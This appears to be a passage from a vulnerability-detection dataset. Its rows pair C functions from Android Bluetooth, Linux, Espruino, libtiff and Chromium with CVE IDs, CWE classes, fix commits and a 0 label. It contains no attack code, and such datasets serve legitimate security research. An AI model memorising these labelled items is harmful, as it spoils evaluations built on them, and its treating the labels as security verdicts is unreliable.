because of data path issues. Delay this disconnect a little bit
*/
BTM_TRACE_ERROR ("peer should have initiated security process by now (SM4 to SM4)");
p_dev_rec->p_callback = p_callback;
p_dev_rec->sec_state = BTM_SEC_STATE_DELAY_FOR_ENC;
(*p_callback) (bd_addr, transport, p_ref_data, rc);
return(BTM_CMD_STARTED);
}
}
p_dev_rec->p_callback = p_callback;
if (p_dev_rec->last_author_service_id == BTM_SEC_NO_LAST_SERVICE_ID
|| p_dev_rec->last_author_service_id != p_dev_rec->p_cur_service->service_id)
{
/* Although authentication and encryption are per connection
** authorization is per access request. For example when serial connection
** is up and authorized and client requests to read file (access to other
** scn), we need to request user's permission again.
*/
p_dev_rec->sec_flags &= ~BTM_SEC_AUTHORIZED;
}
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* If we already have a link key to the connected peer, is the link key secure enough ? */
btm_sec_check_upgrade(p_dev_rec, is_originator);
}
BTM_TRACE_EVENT ("Security Manager: l2cap_access_req PSM:%d Handle:%d State:%d Flags:0x%x Required:0x%x Service ID:%d",
psm, handle, p_dev_rec->sec_state, p_dev_rec->sec_flags, p_dev_rec->security_required, p_dev_rec->p_cur_service->service_id);
if ((rc = btm_sec_execute_procedure (p_dev_rec)) != BTM_CMD_STARTED)
{
p_dev_rec->p_callback = NULL;
(*p_callback) (bd_addr, transport, p_dev_rec->p_ref_data, (UINT8)rc);
}
return(rc);
}
|
tBTM_STATUS btm_sec_l2cap_access_req (BD_ADDR bd_addr, UINT16 psm, UINT16 handle,
CONNECTION_TYPE conn_type,
tBTM_SEC_CALLBACK *p_callback,
void *p_ref_data)
{
tBTM_SEC_DEV_REC *p_dev_rec;
tBTM_SEC_SERV_REC *p_serv_rec;
UINT16 security_required;
UINT16 old_security_required;
BOOLEAN old_is_originator;
tBTM_STATUS rc = BTM_SUCCESS;
BOOLEAN chk_acp_auth_done = FALSE;
BOOLEAN is_originator;
BOOLEAN transport = FALSE; /* should check PSM range in LE connection oriented L2CAP connection */
#if (L2CAP_UCD_INCLUDED == TRUE)
if (conn_type & CONNECTION_TYPE_ORIG_MASK)
is_originator = TRUE;
else
is_originator = FALSE;
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req conn_type:0x%x, 0x%x", conn_type, p_ref_data);
#else
is_originator = conn_type;
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req is_originator:%d, 0x%x", is_originator, p_ref_data);
#endif
/* Find or get oldest record */
p_dev_rec = btm_find_or_alloc_dev (bd_addr);
p_dev_rec->hci_handle = handle;
/* Find the service record for the PSM */
p_serv_rec = btm_sec_find_first_serv (conn_type, psm);
/* If there is no application registered with this PSM do not allow connection */
if (!p_serv_rec)
{
BTM_TRACE_WARNING ("btm_sec_l2cap_access_req() PSM:%d no application registerd", psm);
(*p_callback) (bd_addr, transport, p_ref_data, BTM_MODE_UNSUPPORTED);
return(BTM_MODE_UNSUPPORTED);
}
/* SDP connection we will always let through */
if (BT_PSM_SDP == psm)
{
(*p_callback) (bd_addr,transport, p_ref_data, BTM_SUCCESS_NO_SECURITY);
return(BTM_SUCCESS);
}
#if (L2CAP_UCD_INCLUDED == TRUE)
if ( conn_type & CONNECTION_TYPE_CONNLESS_MASK )
{
security_required = p_serv_rec->ucd_security_flags;
rc = BTM_CMD_STARTED;
if (is_originator)
{
if (((security_required & BTM_SEC_OUT_FLAGS) == 0) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_AUTHENTICATE) && (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT)) && (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_FLAGS) && (p_dev_rec->sec_flags & BTM_SEC_AUTHORIZED))) )
{
rc = BTM_SUCCESS;
}
}
else
{
if (((security_required & BTM_SEC_IN_FLAGS) == 0) ||
((((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHENTICATE) && (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))) ||
((((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT)) && (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED))) ||
((((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_FLAGS) && (p_dev_rec->sec_flags & BTM_SEC_AUTHORIZED))) )
{
rc = BTM_SUCCESS;
}
}
if (rc == BTM_SUCCESS)
{
if (p_callback)
(*p_callback) (bd_addr, transport, (void *)p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
else
#endif
{
security_required = p_serv_rec->security_flags;
}
/* there are some devices (moto KRZR) which connects to several services at the same time */
/* we will process one after another */
if ( (p_dev_rec->p_callback) || (btm_cb.pairing_state != BTM_PAIR_STATE_IDLE) )
{
BTM_TRACE_EVENT ("btm_sec_l2cap_access_req() - busy - PSM:%d delayed state: %s mode:%d, sm4:0x%x",
psm, btm_pair_state_descr(btm_cb.pairing_state), btm_cb.security_mode, p_dev_rec->sm4);
BTM_TRACE_EVENT ("security_flags:x%x, sec_flags:x%x", security_required, p_dev_rec->sec_flags);
rc = BTM_CMD_STARTED;
if ((BTM_SEC_MODE_SP != btm_cb.security_mode)
|| ((BTM_SEC_MODE_SP == btm_cb.security_mode) && (BTM_SM4_KNOWN == p_dev_rec->sm4))
|| (BTM_SEC_IS_SM4(p_dev_rec->sm4) && (btm_sec_is_upgrade_possible(p_dev_rec, is_originator) == FALSE))
)
{
/* legacy mode - local is legacy or local is lisbon/peer is legacy
* or SM4 with no possibility of link key upgrade */
if (is_originator)
{
if (((security_required & BTM_SEC_OUT_FLAGS) == 0) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_AUTHENTICATE) && btm_dev_authenticated(p_dev_rec))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT)) && btm_dev_encrypted(p_dev_rec))) ||
((((security_required & BTM_SEC_OUT_FLAGS) == BTM_SEC_OUT_FLAGS) && btm_dev_authorized(p_dev_rec) && btm_dev_encrypted(p_dev_rec))) )
{
rc = BTM_SUCCESS;
}
}
else
{
if (((security_required & BTM_SEC_IN_FLAGS) == 0) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHENTICATE) && btm_dev_authenticated(p_dev_rec)) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT)) && btm_dev_encrypted(p_dev_rec)) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_AUTHORIZE) && (btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_AUTHORIZE)) && ((btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec)) && btm_dev_authenticated(p_dev_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == (BTM_SEC_IN_ENCRYPT | BTM_SEC_IN_AUTHORIZE)) && ((btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec)) && btm_dev_encrypted(p_dev_rec))) ||
(((security_required & BTM_SEC_IN_FLAGS) == BTM_SEC_IN_FLAGS) && btm_dev_encrypted(p_dev_rec) && (btm_dev_authorized(p_dev_rec)||btm_serv_trusted(p_dev_rec, p_serv_rec))))
{
rc = BTM_SUCCESS;
}
}
if (rc == BTM_SUCCESS)
{
if (p_callback)
(*p_callback) (bd_addr, transport, (void *)p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
btm_cb.sec_req_pending = TRUE;
return(BTM_CMD_STARTED);
}
/* Save pointer to service record */
p_dev_rec->p_cur_service = p_serv_rec;
/* mess /w security_required in btm_sec_l2cap_access_req for Lisbon */
if (btm_cb.security_mode == BTM_SEC_MODE_SP)
{
if (is_originator)
{
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* SM4 to SM4 -> always authenticate & encrypt */
security_required |= (BTM_SEC_OUT_AUTHENTICATE | BTM_SEC_OUT_ENCRYPT);
}
else
{
if ( !(BTM_SM4_KNOWN & p_dev_rec->sm4))
{
BTM_TRACE_DEBUG ("remote features unknown!!sec_flags:0x%x", p_dev_rec->sec_flags);
/* the remote features are not known yet */
p_dev_rec->sm4 |= BTM_SM4_REQ_PEND;
return(BTM_CMD_STARTED);
}
}
}
else
{
/* responder */
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* SM4 to SM4: the acceptor needs to make sure the authentication is already done */
chk_acp_auth_done = TRUE;
/* SM4 to SM4 -> always authenticate & encrypt */
security_required |= (BTM_SEC_IN_AUTHENTICATE | BTM_SEC_IN_ENCRYPT);
}
else
{
if ( !(BTM_SM4_KNOWN & p_dev_rec->sm4))
{
BTM_TRACE_DEBUG ("(rsp) remote features unknown!!sec_flags:0x%x", p_dev_rec->sec_flags);
/* the remote features are not known yet */
p_dev_rec->sm4 |= BTM_SM4_REQ_PEND;
return(BTM_CMD_STARTED);
}
}
}
}
BTM_TRACE_DEBUG ("btm_sec_l2cap_access_req() sm4:0x%x, sec_flags:0x%x, security_required:0x%x chk:%d",
p_dev_rec->sm4, p_dev_rec->sec_flags, security_required, chk_acp_auth_done);
old_security_required = p_dev_rec->security_required;
old_is_originator = p_dev_rec->is_originator;
p_dev_rec->security_required = security_required;
p_dev_rec->p_ref_data = p_ref_data;
p_dev_rec->is_originator = is_originator;
#if (L2CAP_UCD_INCLUDED == TRUE)
if ( conn_type & CONNECTION_TYPE_CONNLESS_MASK )
p_dev_rec->is_ucd = TRUE;
else
p_dev_rec->is_ucd = FALSE;
#endif
/* If there are multiple service records used through the same PSM */
/* leave security decision for the multiplexor on the top */
#if (L2CAP_UCD_INCLUDED == TRUE)
if (((btm_sec_find_next_serv (p_serv_rec)) != NULL)
&&(!( conn_type & CONNECTION_TYPE_CONNLESS_MASK ))) /* if not UCD */
#else
if ((btm_sec_find_next_serv (p_serv_rec)) != NULL)
#endif
{
BTM_TRACE_DEBUG ("no next_serv sm4:0x%x, chk:%d", p_dev_rec->sm4, chk_acp_auth_done);
if (!BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
BTM_TRACE_EVENT ("Security Manager: l2cap_access_req PSM:%d postponed for multiplexer", psm);
/* pre-Lisbon: restore the old settings */
p_dev_rec->security_required = old_security_required;
p_dev_rec->is_originator = old_is_originator;
(*p_callback) (bd_addr, transport, p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
}
/* if the originator is using dynamic PSM in legacy mode, do not start any security process now.
* The layer above L2CAP needs to carry out the security requirement after L2CAP connect response is received*/
if (is_originator && (btm_cb.security_mode != BTM_SEC_MODE_SP || !BTM_SEC_IS_SM4(p_dev_rec->sm4)) && (psm >= 0x1001))
{
BTM_TRACE_EVENT ("dynamic PSM:0x%x in legacy mode - postponed for upper layer", psm);
/* restore the old settings */
p_dev_rec->security_required = old_security_required;
p_dev_rec->is_originator = old_is_originator;
(*p_callback) (bd_addr, transport, p_ref_data, BTM_SUCCESS);
return(BTM_SUCCESS);
}
if (chk_acp_auth_done)
{
BTM_TRACE_DEBUG ("(SM4 to SM4) btm_sec_l2cap_access_req rspd. authenticated: x%x, enc: x%x",
(p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED), (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED));
/* SM4, but we do not know for sure which level of security we need.
* as long as we have a link key, it's OK */
if ((0 == (p_dev_rec->sec_flags & BTM_SEC_AUTHENTICATED))
||(0 == (p_dev_rec->sec_flags & BTM_SEC_ENCRYPTED)))
{
rc = BTM_DELAY_CHECK;
/*
2046 may report HCI_Encryption_Change and L2C Connection Request out of sequence
because of data path issues. Delay this disconnect a little bit
*/
BTM_TRACE_ERROR ("peer should have initiated security process by now (SM4 to SM4)");
p_dev_rec->p_callback = p_callback;
p_dev_rec->sec_state = BTM_SEC_STATE_DELAY_FOR_ENC;
(*p_callback) (bd_addr, transport, p_ref_data, rc);
return(BTM_CMD_STARTED);
}
}
p_dev_rec->p_callback = p_callback;
if (p_dev_rec->last_author_service_id == BTM_SEC_NO_LAST_SERVICE_ID
|| p_dev_rec->last_author_service_id != p_dev_rec->p_cur_service->service_id)
{
/* Although authentication and encryption are per connection
** authorization is per access request. For example when serial connection
** is up and authorized and client requests to read file (access to other
** scn), we need to request user's permission again.
*/
p_dev_rec->sec_flags &= ~BTM_SEC_AUTHORIZED;
}
if (BTM_SEC_IS_SM4(p_dev_rec->sm4))
{
/* If we already have a link key to the connected peer, is the link key secure enough ? */
btm_sec_check_upgrade(p_dev_rec, is_originator);
}
BTM_TRACE_EVENT ("Security Manager: l2cap_access_req PSM:%d Handle:%d State:%d Flags:0x%x Required:0x%x Service ID:%d",
psm, handle, p_dev_rec->sec_state, p_dev_rec->sec_flags, p_dev_rec->security_required, p_dev_rec->p_cur_service->service_id);
if ((rc = btm_sec_execute_procedure (p_dev_rec)) != BTM_CMD_STARTED)
{
p_dev_rec->p_callback = NULL;
(*p_callback) (bd_addr, transport, p_dev_rec->p_ref_data, (UINT8)rc);
}
return(rc);
}
|
C
|
Android
| 0 |
CVE-2016-1583
|
https://www.cvedetails.com/cve/CVE-2016-1583/
|
CWE-119
|
https://github.com/torvalds/linux/commit/f5364c150aa645b3d7daa21b5c0b9feaa1c9cd6d
|
f5364c150aa645b3d7daa21b5c0b9feaa1c9cd6d
|
Merge branch 'stacking-fixes' (vfs stacking fixes from Jann)
Merge filesystem stacking fixes from Jann Horn.
* emailed patches from Jann Horn <jannh@google.com>:
sched: panic on corrupted stack end
ecryptfs: forbid opening files without mmap handler
proc: prevent stacking filesystems on top
|
static inline void preempt_latency_stop(int val) { }
|
static inline void preempt_latency_stop(int val) { }
|
C
|
linux
| 0 |
CVE-2018-11597
|
https://www.cvedetails.com/cve/CVE-2018-11597/
|
CWE-674
|
https://github.com/espruino/Espruino/commit/51380baf17241728b6d48cdb84140b931e3e3cc5
|
51380baf17241728b6d48cdb84140b931e3e3cc5
|
Fix stack overflow if interpreting a file full of '{' (fix #1448)
|
NO_INLINE JsVar *jspeBlockOrStatement() {
if (lex->tk=='{') {
jspeBlock();
return 0;
} else {
JsVar *v = jspeStatement();
if (lex->tk==';') JSP_ASSERT_MATCH(';');
return v;
}
}
/** Parse using current lexer until we hit the end of
* input or there was some problem. */
NO_INLINE JsVar *jspParse() {
JsVar *v = 0;
while (!JSP_SHOULDNT_PARSE && lex->tk != LEX_EOF) {
jsvUnLock(v);
v = jspeBlockOrStatement();
}
return v;
}
NO_INLINE JsVar *jspeStatementVar() {
JsVar *lastDefined = 0;
/* variable creation. TODO - we need a better way of parsing the left
* hand side. Maybe just have a flag called can_create_var that we
* set and then we parse as if we're doing a normal equals.*/
assert(lex->tk==LEX_R_VAR || lex->tk==LEX_R_LET || lex->tk==LEX_R_CONST);
jslGetNextToken();
bool hasComma = true; // for first time in loop
while (hasComma && lex->tk == LEX_ID && !jspIsInterrupted()) {
JsVar *a = 0;
if (JSP_SHOULD_EXECUTE) {
a = jspeiFindOnTop(jslGetTokenValueAsString(lex), true);
if (!a) { // out of memory
jspSetError(false);
return lastDefined;
}
}
JSP_MATCH_WITH_CLEANUP_AND_RETURN(LEX_ID, jsvUnLock(a), lastDefined);
if (lex->tk == '=') {
JsVar *var;
JSP_MATCH_WITH_CLEANUP_AND_RETURN('=', jsvUnLock(a), lastDefined);
var = jsvSkipNameAndUnLock(jspeAssignmentExpression());
if (JSP_SHOULD_EXECUTE)
jsvReplaceWith(a, var);
jsvUnLock(var);
}
jsvUnLock(lastDefined);
lastDefined = a;
hasComma = lex->tk == ',';
if (hasComma) JSP_MATCH_WITH_RETURN(',', lastDefined);
}
return lastDefined;
}
NO_INLINE JsVar *jspeStatementIf() {
bool cond;
JsVar *var, *result = 0;
JSP_ASSERT_MATCH(LEX_R_IF);
JSP_MATCH('(');
var = jspeExpression();
if (JSP_SHOULDNT_PARSE) return var;
JSP_MATCH(')');
cond = JSP_SHOULD_EXECUTE && jsvGetBoolAndUnLock(jsvSkipName(var));
jsvUnLock(var);
JSP_SAVE_EXECUTE();
if (!cond) jspSetNoExecute();
JsVar *a = jspeBlockOrStatement();
if (!cond) {
jsvUnLock(a);
JSP_RESTORE_EXECUTE();
} else {
result = a;
}
if (lex->tk==LEX_R_ELSE) {
JSP_ASSERT_MATCH(LEX_R_ELSE);
JSP_SAVE_EXECUTE();
if (cond) jspSetNoExecute();
JsVar *a = jspeBlockOrStatement();
if (cond) {
jsvUnLock(a);
JSP_RESTORE_EXECUTE();
} else {
result = a;
}
}
return result;
}
NO_INLINE JsVar *jspeStatementSwitch() {
JSP_ASSERT_MATCH(LEX_R_SWITCH);
JSP_MATCH('(');
JsVar *switchOn = jspeExpression();
JSP_SAVE_EXECUTE();
bool execute = JSP_SHOULD_EXECUTE;
JSP_MATCH_WITH_CLEANUP_AND_RETURN(')', jsvUnLock(switchOn), 0);
if (!execute) { jsvUnLock(switchOn); jspeBlock(); return 0; }
JSP_MATCH_WITH_CLEANUP_AND_RETURN('{', jsvUnLock(switchOn), 0);
bool executeDefault = true;
if (execute) execInfo.execute=EXEC_NO|EXEC_IN_SWITCH;
while (lex->tk==LEX_R_CASE) {
JSP_MATCH_WITH_CLEANUP_AND_RETURN(LEX_R_CASE, jsvUnLock(switchOn), 0);
JsExecFlags oldFlags = execInfo.execute;
if (execute) execInfo.execute=EXEC_YES|EXEC_IN_SWITCH;
JsVar *test = jspeAssignmentExpression();
execInfo.execute = oldFlags|EXEC_IN_SWITCH;;
JSP_MATCH_WITH_CLEANUP_AND_RETURN(':', jsvUnLock2(switchOn, test), 0);
bool cond = false;
if (execute)
cond = jsvGetBoolAndUnLock(jsvMathsOpSkipNames(switchOn, test, LEX_TYPEEQUAL));
if (cond) executeDefault = false;
jsvUnLock(test);
if (cond && (execInfo.execute&EXEC_RUN_MASK)==EXEC_NO)
execInfo.execute=EXEC_YES|EXEC_IN_SWITCH;
while (!JSP_SHOULDNT_PARSE && lex->tk!=LEX_EOF && lex->tk!=LEX_R_CASE && lex->tk!=LEX_R_DEFAULT && lex->tk!='}')
jsvUnLock(jspeBlockOrStatement());
oldExecute |= execInfo.execute & (EXEC_ERROR_MASK|EXEC_RETURN); // copy across any errors/exceptions/returns
}
jsvUnLock(switchOn);
if (execute && (execInfo.execute&EXEC_RUN_MASK)==EXEC_BREAK) {
execInfo.execute=EXEC_YES|EXEC_IN_SWITCH;
} else {
executeDefault = true;
}
JSP_RESTORE_EXECUTE();
if (lex->tk==LEX_R_DEFAULT) {
JSP_ASSERT_MATCH(LEX_R_DEFAULT);
JSP_MATCH(':');
JSP_SAVE_EXECUTE();
if (!executeDefault) jspSetNoExecute();
else execInfo.execute |= EXEC_IN_SWITCH;
while (!JSP_SHOULDNT_PARSE && lex->tk!=LEX_EOF && lex->tk!='}')
jsvUnLock(jspeBlockOrStatement());
oldExecute |= execInfo.execute & (EXEC_ERROR_MASK|EXEC_RETURN); // copy across any errors/exceptions/returns
execInfo.execute = execInfo.execute & (JsExecFlags)~EXEC_BREAK;
JSP_RESTORE_EXECUTE();
}
JSP_MATCH('}');
|
NO_INLINE JsVar *jspeBlockOrStatement() {
if (lex->tk=='{') {
jspeBlock();
return 0;
} else {
JsVar *v = jspeStatement();
if (lex->tk==';') JSP_ASSERT_MATCH(';');
return v;
}
}
/** Parse using current lexer until we hit the end of
* input or there was some problem. */
NO_INLINE JsVar *jspParse() {
JsVar *v = 0;
while (!JSP_SHOULDNT_PARSE && lex->tk != LEX_EOF) {
jsvUnLock(v);
v = jspeBlockOrStatement();
}
return v;
}
NO_INLINE JsVar *jspeStatementVar() {
JsVar *lastDefined = 0;
/* variable creation. TODO - we need a better way of parsing the left
* hand side. Maybe just have a flag called can_create_var that we
* set and then we parse as if we're doing a normal equals.*/
assert(lex->tk==LEX_R_VAR || lex->tk==LEX_R_LET || lex->tk==LEX_R_CONST);
jslGetNextToken();
bool hasComma = true; // for first time in loop
while (hasComma && lex->tk == LEX_ID && !jspIsInterrupted()) {
JsVar *a = 0;
if (JSP_SHOULD_EXECUTE) {
a = jspeiFindOnTop(jslGetTokenValueAsString(lex), true);
if (!a) { // out of memory
jspSetError(false);
return lastDefined;
}
}
JSP_MATCH_WITH_CLEANUP_AND_RETURN(LEX_ID, jsvUnLock(a), lastDefined);
if (lex->tk == '=') {
JsVar *var;
JSP_MATCH_WITH_CLEANUP_AND_RETURN('=', jsvUnLock(a), lastDefined);
var = jsvSkipNameAndUnLock(jspeAssignmentExpression());
if (JSP_SHOULD_EXECUTE)
jsvReplaceWith(a, var);
jsvUnLock(var);
}
jsvUnLock(lastDefined);
lastDefined = a;
hasComma = lex->tk == ',';
if (hasComma) JSP_MATCH_WITH_RETURN(',', lastDefined);
}
return lastDefined;
}
NO_INLINE JsVar *jspeStatementIf() {
bool cond;
JsVar *var, *result = 0;
JSP_ASSERT_MATCH(LEX_R_IF);
JSP_MATCH('(');
var = jspeExpression();
if (JSP_SHOULDNT_PARSE) return var;
JSP_MATCH(')');
cond = JSP_SHOULD_EXECUTE && jsvGetBoolAndUnLock(jsvSkipName(var));
jsvUnLock(var);
JSP_SAVE_EXECUTE();
if (!cond) jspSetNoExecute();
JsVar *a = jspeBlockOrStatement();
if (!cond) {
jsvUnLock(a);
JSP_RESTORE_EXECUTE();
} else {
result = a;
}
if (lex->tk==LEX_R_ELSE) {
JSP_ASSERT_MATCH(LEX_R_ELSE);
JSP_SAVE_EXECUTE();
if (cond) jspSetNoExecute();
JsVar *a = jspeBlockOrStatement();
if (cond) {
jsvUnLock(a);
JSP_RESTORE_EXECUTE();
} else {
result = a;
}
}
return result;
}
NO_INLINE JsVar *jspeStatementSwitch() {
JSP_ASSERT_MATCH(LEX_R_SWITCH);
JSP_MATCH('(');
JsVar *switchOn = jspeExpression();
JSP_SAVE_EXECUTE();
bool execute = JSP_SHOULD_EXECUTE;
JSP_MATCH_WITH_CLEANUP_AND_RETURN(')', jsvUnLock(switchOn), 0);
if (!execute) { jsvUnLock(switchOn); jspeBlock(); return 0; }
JSP_MATCH_WITH_CLEANUP_AND_RETURN('{', jsvUnLock(switchOn), 0);
bool executeDefault = true;
if (execute) execInfo.execute=EXEC_NO|EXEC_IN_SWITCH;
while (lex->tk==LEX_R_CASE) {
JSP_MATCH_WITH_CLEANUP_AND_RETURN(LEX_R_CASE, jsvUnLock(switchOn), 0);
JsExecFlags oldFlags = execInfo.execute;
if (execute) execInfo.execute=EXEC_YES|EXEC_IN_SWITCH;
JsVar *test = jspeAssignmentExpression();
execInfo.execute = oldFlags|EXEC_IN_SWITCH;;
JSP_MATCH_WITH_CLEANUP_AND_RETURN(':', jsvUnLock2(switchOn, test), 0);
bool cond = false;
if (execute)
cond = jsvGetBoolAndUnLock(jsvMathsOpSkipNames(switchOn, test, LEX_TYPEEQUAL));
if (cond) executeDefault = false;
jsvUnLock(test);
if (cond && (execInfo.execute&EXEC_RUN_MASK)==EXEC_NO)
execInfo.execute=EXEC_YES|EXEC_IN_SWITCH;
while (!JSP_SHOULDNT_PARSE && lex->tk!=LEX_EOF && lex->tk!=LEX_R_CASE && lex->tk!=LEX_R_DEFAULT && lex->tk!='}')
jsvUnLock(jspeBlockOrStatement());
oldExecute |= execInfo.execute & (EXEC_ERROR_MASK|EXEC_RETURN); // copy across any errors/exceptions/returns
}
jsvUnLock(switchOn);
if (execute && (execInfo.execute&EXEC_RUN_MASK)==EXEC_BREAK) {
execInfo.execute=EXEC_YES|EXEC_IN_SWITCH;
} else {
executeDefault = true;
}
JSP_RESTORE_EXECUTE();
if (lex->tk==LEX_R_DEFAULT) {
JSP_ASSERT_MATCH(LEX_R_DEFAULT);
JSP_MATCH(':');
JSP_SAVE_EXECUTE();
if (!executeDefault) jspSetNoExecute();
else execInfo.execute |= EXEC_IN_SWITCH;
while (!JSP_SHOULDNT_PARSE && lex->tk!=LEX_EOF && lex->tk!='}')
jsvUnLock(jspeBlockOrStatement());
oldExecute |= execInfo.execute & (EXEC_ERROR_MASK|EXEC_RETURN); // copy across any errors/exceptions/returns
execInfo.execute = execInfo.execute & (JsExecFlags)~EXEC_BREAK;
JSP_RESTORE_EXECUTE();
}
JSP_MATCH('}');
|
C
|
Espruino
| 0 |
CVE-2014-8130
|
https://www.cvedetails.com/cve/CVE-2014-8130/
|
CWE-369
|
https://github.com/vadz/libtiff/commit/3c5eb8b1be544e41d2c336191bc4936300ad7543
|
3c5eb8b1be544e41d2c336191bc4936300ad7543
|
* libtiff/tif_{unix,vms,win32}.c (_TIFFmalloc): ANSI C does not
require malloc() to return NULL pointer if requested allocation
size is zero. Assure that _TIFFmalloc does.
|
_TIFFmemcmp(const void* p1, const void* p2, tmsize_t c)
{
return (memcmp(p1, p2, (size_t) c));
}
|
_TIFFmemcmp(const void* p1, const void* p2, tmsize_t c)
{
return (memcmp(p1, p2, (size_t) c));
}
|
C
|
libtiff
| 0 |
CVE-2018-20066
|
https://www.cvedetails.com/cve/CVE-2018-20066/
|
CWE-416
|
https://github.com/chromium/chromium/commit/2f0b419df243400f954e11b649f4862a1e0ff367
|
2f0b419df243400f954e11b649f4862a1e0ff367
|
Fix the regression caused by http://crrev.com/c/1288350.
Bug: 900124,856135
Change-Id: Ie11ad406bd1ea383dc2a83cc8661076309154865
Reviewed-on: https://chromium-review.googlesource.com/c/1317010
Reviewed-by: Lan Wei <azurewei@chromium.org>
Commit-Queue: Shu Chen <shuchen@chromium.org>
Cr-Commit-Position: refs/heads/master@{#605282}
|
void ImeObserver::OnKeyEvent(
const std::string& component_id,
const InputMethodEngineBase::KeyboardEvent& event,
IMEEngineHandlerInterface::KeyEventDoneCallback key_data) {
if (extension_id_.empty())
return;
if (!ShouldForwardKeyEvent()) {
std::move(key_data).Run(false);
return;
}
extensions::InputImeEventRouter* event_router =
extensions::GetInputImeEventRouter(profile_);
if (!event_router || !event_router->GetActiveEngine(extension_id_))
return;
const std::string request_id =
event_router->GetActiveEngine(extension_id_)
->AddRequest(component_id, std::move(key_data));
input_ime::KeyboardEvent key_data_value;
key_data_value.type = input_ime::ParseKeyboardEventType(event.type);
key_data_value.request_id = request_id;
if (!event.extension_id.empty())
key_data_value.extension_id.reset(new std::string(event.extension_id));
key_data_value.key = event.key;
key_data_value.code = event.code;
key_data_value.alt_key.reset(new bool(event.alt_key));
key_data_value.ctrl_key.reset(new bool(event.ctrl_key));
key_data_value.shift_key.reset(new bool(event.shift_key));
key_data_value.caps_lock.reset(new bool(event.caps_lock));
std::unique_ptr<base::ListValue> args(
input_ime::OnKeyEvent::Create(component_id, key_data_value));
DispatchEventToExtension(extensions::events::INPUT_IME_ON_KEY_EVENT,
input_ime::OnKeyEvent::kEventName, std::move(args));
}
|
void ImeObserver::OnKeyEvent(
const std::string& component_id,
const InputMethodEngineBase::KeyboardEvent& event,
IMEEngineHandlerInterface::KeyEventDoneCallback key_data) {
if (extension_id_.empty())
return;
if (!ShouldForwardKeyEvent()) {
std::move(key_data).Run(false);
return;
}
extensions::InputImeEventRouter* event_router =
extensions::GetInputImeEventRouter(profile_);
if (!event_router || !event_router->GetActiveEngine(extension_id_))
return;
const std::string request_id =
event_router->GetActiveEngine(extension_id_)
->AddRequest(component_id, std::move(key_data));
input_ime::KeyboardEvent key_data_value;
key_data_value.type = input_ime::ParseKeyboardEventType(event.type);
key_data_value.request_id = request_id;
if (!event.extension_id.empty())
key_data_value.extension_id.reset(new std::string(event.extension_id));
key_data_value.key = event.key;
key_data_value.code = event.code;
key_data_value.alt_key.reset(new bool(event.alt_key));
key_data_value.ctrl_key.reset(new bool(event.ctrl_key));
key_data_value.shift_key.reset(new bool(event.shift_key));
key_data_value.caps_lock.reset(new bool(event.caps_lock));
std::unique_ptr<base::ListValue> args(
input_ime::OnKeyEvent::Create(component_id, key_data_value));
DispatchEventToExtension(extensions::events::INPUT_IME_ON_KEY_EVENT,
input_ime::OnKeyEvent::kEventName, std::move(args));
}
|
C
|
Chrome
| 0 |
CVE-2013-2635
|
https://www.cvedetails.com/cve/CVE-2013-2635/
|
CWE-399
|
https://github.com/torvalds/linux/commit/84d73cd3fb142bf1298a8c13fd4ca50fd2432372
|
84d73cd3fb142bf1298a8c13fd4ca50fd2432372
|
rtnl: fix info leak on RTM_GETLINK request for VF devices
Initialize the mac address buffer with 0 as the driver specific function
will probably not fill the whole buffer. In fact, all in-kernel drivers
fill only ETH_ALEN of the MAX_ADDR_LEN bytes, i.e. 6 of the 32 possible
bytes. Therefore we currently leak 26 bytes of stack memory to userland
via the netlink interface.
Signed-off-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
static unsigned int rtnl_dev_combine_flags(const struct net_device *dev,
const struct ifinfomsg *ifm)
{
unsigned int flags = ifm->ifi_flags;
/* bugwards compatibility: ifi_change == 0 is treated as ~0 */
if (ifm->ifi_change)
flags = (flags & ifm->ifi_change) |
(rtnl_dev_get_flags(dev) & ~ifm->ifi_change);
return flags;
}
|
static unsigned int rtnl_dev_combine_flags(const struct net_device *dev,
const struct ifinfomsg *ifm)
{
unsigned int flags = ifm->ifi_flags;
/* bugwards compatibility: ifi_change == 0 is treated as ~0 */
if (ifm->ifi_change)
flags = (flags & ifm->ifi_change) |
(rtnl_dev_get_flags(dev) & ~ifm->ifi_change);
return flags;
}
|
C
